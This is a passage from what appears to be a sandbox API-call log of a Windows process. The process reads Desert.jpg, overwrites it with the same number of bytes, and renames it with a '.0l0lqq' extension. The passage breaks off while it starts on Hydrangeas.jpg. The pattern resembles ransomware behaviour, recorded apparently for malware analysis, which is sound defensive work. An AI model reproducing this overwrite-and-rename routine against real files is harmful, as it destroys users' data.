lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.916] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.916] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.916] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.916] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.916] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.916] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875)) returned 1 [0246.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0246.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), fInfoLevelId=0x0, lpFileInformation=0x73d7510 | out: lpFileInformation=0x73d7510*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875)) returned 1 [0246.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0246.917] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.917] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.917] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875)) returned 1 [0246.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.917] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.917] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.918] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26d8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0246.918] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26ddbc | out: lpFileInformation=0x26ddbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875)) returned 1 [0246.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0246.918] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0246.918] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), fInfoLevelId=0x0, lpFileInformation=0x73da614 | out: lpFileInformation=0x73da614*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875)) returned 1 [0246.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0246.918] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0246.918] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), fInfoLevelId=0x0, lpFileInformation=0x73da6f0 | out: lpFileInformation=0x73da6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875)) returned 1 [0246.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0246.920] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0246.920] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x558 [0246.920] GetFileType (hFile=0x558) returned 0x1 [0246.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0246.920] GetFileType (hFile=0x558) returned 0x1 [0246.920] GetFileSize (in: hFile=0x558, lpFileSizeHigh=0x26dd80 | out: lpFileSizeHigh=0x26dd80*=0x0) returned 0xce875 [0246.921] ReadFile (in: hFile=0x558, lpBuffer=0x3276150, nNumberOfBytesToRead=0xce875, lpNumberOfBytesRead=0x26dd2c, lpOverlapped=0x0 | out: lpBuffer=0x3276150*, lpNumberOfBytesRead=0x26dd2c*=0xce875, lpOverlapped=0x0) returned 1 [0246.935] CloseHandle (hObject=0x558) returned 1 [0246.996] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0246.996] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x558 [0247.005] GetFileType (hFile=0x558) returned 0x1 [0247.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0247.005] GetFileType (hFile=0x558) returned 0x1 [0247.005] WriteFile (in: hFile=0x558, lpBuffer=0x391b4d0*, nNumberOfBytesToWrite=0xce875, lpNumberOfBytesWritten=0x26dd1c, lpOverlapped=0x0 | out: lpBuffer=0x391b4d0*, lpNumberOfBytesWritten=0x26dd1c*=0xce875, lpOverlapped=0x0) returned 1 [0247.045] CloseHandle (hObject=0x558) returned 1 [0247.056] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0247.057] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.0l0lqq", lpFilePart=0x0) returned 0x3a [0247.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0247.057] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26dd80 | out: lpFileInformation=0x26dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x64500830, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0xce875)) returned 1 [0247.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0247.057] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.0l0lqq" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.0l0lqq")) returned 1 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", lpFilePart=0x0) returned 0x34 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", lpFilePart=0x0) returned 0x34 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", lpFilePart=0x0) returned 0x34 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.065] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.065] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.065] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.065] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.065] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.065] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.065] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.065] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554)) returned 1 [0247.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0247.067] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), fInfoLevelId=0x0, lpFileInformation=0x738d15c | out: lpFileInformation=0x738d15c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554)) returned 1 [0247.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0247.067] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.067] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.067] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554)) returned 1 [0247.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.067] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0247.068] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x26d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 